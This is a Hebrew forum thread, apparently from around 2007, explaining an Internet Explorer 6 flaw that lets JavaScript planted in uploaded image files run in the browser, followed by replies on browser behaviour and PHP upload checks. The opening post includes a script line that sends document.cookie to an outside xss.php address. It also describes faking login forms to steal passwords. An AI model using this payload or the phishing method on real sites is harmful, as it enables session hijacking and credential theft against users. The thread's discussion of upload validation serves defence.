מדריך זה אינו מעודד פריצות, או כל שימוש שעשוי להיות לרעה.

האחריות היא עליכם.

מצרכים:

• מערכת העלאת קבצים
• עוגיות שמורות עם אותו ניתוב

פרצת האבטחה החמורה הזאת התגלתה בשרתי הדוא"ל של נענע, וואלה, הוטמייל ועוד רבים (אך טופלה לא מזמן) כך שעדיין יש המון אתרים שלא חסמו את זה.

הרעיון הוא להשתיל קוד דרך תמונה פשוטה שעשויה להיראות תמימה, אך היא יכולה לגרום למשתמש שלכם להיפרץ, או אפילו גרוע יותר.

הנה דוגמא קטנה:

https://2007-uploaded.fresh.co.il/2...24/55431145.gif

לאלה שיודעים טיפה JS והסתכלו במקור התמונה כבר כל העניין עשוי להתברר, אבל למען אלה שעדיין לא הבינו אמשיך לקונספט עצמו.

העוגיות נשמרות תחת ניתוב מסויים, שהוא מבדיל אותן בין אם הן עוגיות של פורום פרש, או כל פורום/מערכת אחרת תחת דומיין אחר.

לכן ברגע שהפעלתם קובץ מושתל שלכם בשרת מרוחק, הגישה לעוגיות מתאפשרת.

הנה דוגמא להצגה של העוגיה שלכם מפורום פרש:
https://2007-uploaded.fresh.co.il/2...24/76529332.gif

במקרה זה הקוד רק מציג את העוגיות שלכם בפרש, אבל מה אם הן היו נשלחות להאקר כלשהו?

למשל דבר כזה עשוי "לגנוב" את העוגיות שלכם ולשלוח לאדם לא רצוי:

קוד:

<script>window.location.href="http://www.domain.co.il/xss.php?s="+document.cookie</script>

עוד דרך לגנוב שם משתמש וסיסמא היא לבנות תמונה שמכילה קוד של התחברות מקורית, כך שתכולת התמונה תכיל היעתק מדוייק של ההתחברות.
אחרי שהמשתמש התמים יכניס את פרטיו הוא יבין שהוא נפל קורבן לידיו של האקר כלשהו.
אפשר אפילו להסוות התחברות כזאת להתחברות אמיתית, ככה שהקורבן אפילו לא יבחין בכך.

לכן אם אתם מקבלים לינק לתמונה כלשהי, שימו לב שאתם לא מתנתקים בפתאומיות מהמערכת, וכשאתם מתחברים אליה, תמיד הכנסו בעצמכם מחדש לאתר - והתחברו.

הנה דוגמא לזיוף התחברות:

https://2007-uploaded.fresh.co.il/2...24/22064108.gif

לכן גם אם אתם בעצמכם בונים מערכת העלאת קבצים, שימו לב לזה, אם אתם לא רוצים שמשתמשים יתחילו להיפרץ.

אז... היזהרו

תודה רבה

אני מניח שזה עובד רק באקספלורר 6, כי ב7 זה לא רשם לי את הקוקיס, וזה לא עשה כלום...
בפיירפוקס זה רשם שהתמונה לא בסדר.

אני גם מניח שזה תלוי ב content-type שהדפדפן מקבל, הוא אמור לצפות לתמונה - ואין לו מה לעשות עם תמונה אם זה קוד JS בכלל.
לכן, השועל כותב:

קוד:

The image “https://2007-uploaded.fresh.co.il/2007/11/24/55431145.gif” cannot be displayed, because it contains errors.

עריכה:
אכן, זה באג באינטרנט אקספלורר 6 בכלל, אבל תודה על האזהרה

גם באופרה לא קורה כלום, אבל אחוז הגולשים שעדיין משתמשים ב-IE6 בהחלט מצדיק את המאמר
בארכיון + צל"ש לשבוע.

תודה רבה על המאמר!
אבל יש לי שאלה. איך אפשר להגן מזה?
אני יודע שאפשר פשוט לסנן JS. אבל יש דרך לזהות אם זה תמונה או לא?

אם אין לך אקספלורר 6 אין לך מה לדאוג
ואם יש לך
View Source יהיה מאוחר מידי

אני שואל בתור בונה אתרים, שמנסה להיתחשב בכל הדפדפנים, איך מגנים מיזה... ולא איך להגן על עצמי...

אם אתה מתעסק ב PHP אז אני מניח שהדרך הכי טובה היא

קוד PHP:

 if (getimagesize($img_path) === false)
    # Not an image
else
    # An image 


תודה על הדוגמא, אבל לא צריך רק פעמים את האופרטור "==" ?

תעביר סינון על

קוד PHP:

 $_FILES['upload']['type'] 


ברגע שמשתילים קוד, הסוג של הקובץ הופך להיות text/html.

כיוון שבאורח טבעי אין לי דרך לבדוק את זה עם אקספלורר 6 - תמוה בעיני שעוגיות של פרש יוצגו בקוד שיושב בתוך קובץ התמונה הזה, אפילו בדפדפן עם באגים כמו אקספלורר - בגלל איך שהעוגיות בפרש פועלות.

האם באמת זה פעל פה למישהו על עוגיות של פרש?

נמאס לכם לזכור סיסמאות? לחצו כאן!

לא, אבל זה פועל על העוגיות של Google Analytics (אם הבנתי נכון את השמות המוזרים שמתחילים ב-"__" ).

וזו לא פרצת אבטחה...

שלום ותודה על הדגים

נמאס לכם לזכור סיסמאות? לחצו כאן!

למען האמת לא המצאתי את זה, קראתי על זה בכתבה כללית, את הדרך עצמה לשתילת הקוד אני בעצמי מצאתי.

באתר myspace חור האבטחה הזה נוצל ומאות משתמשים נפרצו, לאו דווקא שהפורץ ישתמש בגניבת עוגיות.
כמו שרשמתי כבר, רעיון יותר מוצלח אולי יכול להיות זיוף טופס שלם.

משנים רק את ה action לדף שלך, ומכניסים את הפרטים למסד/כל קובץ.

כל משתמש יכול לא לשים לב לדבר פעוט כמו הכתובת, ולפני שיספיק לשים לב יהיה כבר מאוחר מדי.

אבל זה כבר phishing, וזה נושא אחר לגמרי

לא אמרתי שהמצאת, רק אמרתי שכאן מישהו חשב על זה והגן מפני זה כבר לפני... שנים

נמאס לכם לזכור סיסמאות? לחצו כאן!

הקטע הזה עם וואלה דווקא שמעתי על כמה שנפלו ככה. ואני בעצמי כמעט נפלתי קורבן לדף כזה.

אצלי רואים את התוכן של הקוקיס...

מה עשית עם העוגיות של פרש שזה לא מציג אותם?

העוגיות של פרש כנראה שייכות ל path הפורום
vBulletin..

מה גם שהתמונות נמצאות בדומיין אחר לגמרי: uploaded.fresh.co.il